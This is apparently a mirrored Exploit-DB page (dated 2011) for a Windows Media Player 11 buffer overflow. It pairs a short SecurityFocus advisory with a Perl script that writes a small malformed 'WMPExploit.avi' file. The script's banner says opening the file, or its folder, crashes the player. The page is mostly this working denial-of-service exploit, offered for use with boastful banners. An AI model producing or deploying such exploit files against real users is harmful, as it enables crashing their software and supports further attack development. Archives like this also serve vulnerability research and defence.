Microsoft Windows Media Player 11.0.5721.5145 – ‘.avi’ Buffer Overflow - 体验盒子

作者： ^Xecuti0N3r

日期： 2011-03-31

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/35553/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

source: https://www.securityfocus.com/bid/47112/info

Microsoft Windows Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Microsoft Windows Media Player 11.0.5721.5145 is vulnerable; other versions may also be affected.

#!/usr/bin/perl

#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit

#(+)Software: Windows Media player

#(+)Version : 11.0.5721.5145

#(+)Tested On : WIN-XP SP3

#(+) Date : 31.03.2011

#(+) Hour : 13:37

#Similar Bug was found by cr4wl3r in MediaPlayer Classic

system("color 6");

system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");

print "

_______________________________________________________________________

(+)Exploit Title:Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit

(+) Software: Windows Media player

(+) Version : 11.0.5721.5145

(+) Tested On : WIN-XP SP3

(+) Date: 31.03.2011

(+) Hour: 13:37 PM

____________________________________________________________________\n ";

sleep 2;

system("cls");

system("color 2");

print "\nGenerating the exploit file !!!";

sleep 2;

print "\n\nWMPExploit.avi file generated!!";

sleep 2;

$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

open(file, "> WMPExploit.avi");

print (file $theoverflow);

print "\n\n(+) Done!\n

(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n

(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;

system("cls");

sleep 1;

system("color C");

print "\n\n\n########################################################################\n

(+)Exploit Coded by: ^Xecuti0N3r\n

(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n

(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n

########################################################################\n\n";

system("pause");